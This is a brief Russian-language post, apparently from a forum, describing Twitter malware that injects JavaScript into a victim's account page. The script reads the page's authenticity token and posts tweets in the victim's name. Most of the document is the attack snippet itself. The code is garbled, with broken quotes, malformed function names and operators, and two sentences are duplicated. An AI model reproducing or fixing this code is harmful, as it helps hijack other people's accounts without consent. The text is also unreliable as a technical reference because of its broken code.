Атака осуществляется путем введения кода Javascript на странице акаунта Twitter жертвы.
Мальварь собирает токен аутентификации юзера, что позволяет совершать вызовы к API, а потом постить твиты от имени жертвы.
Кода JavaScript:
Мальварь собирает токен аутентификации юзера, что позволяет совершать вызовы к API, а потом постить твиты от имени жертвы.
Кода JavaScript:
Код:
function_PostTweet(){
var a = $("input[name="authenticity_token"].val();
a.length.0&& $.post("/i/tweet/create",{
authenticity_token: a,
place_id:"",
status_GetRndMsg()
}),always(function(){
ar[0].msgsent=1, SetO(), window.location.href=window.location.href
})
}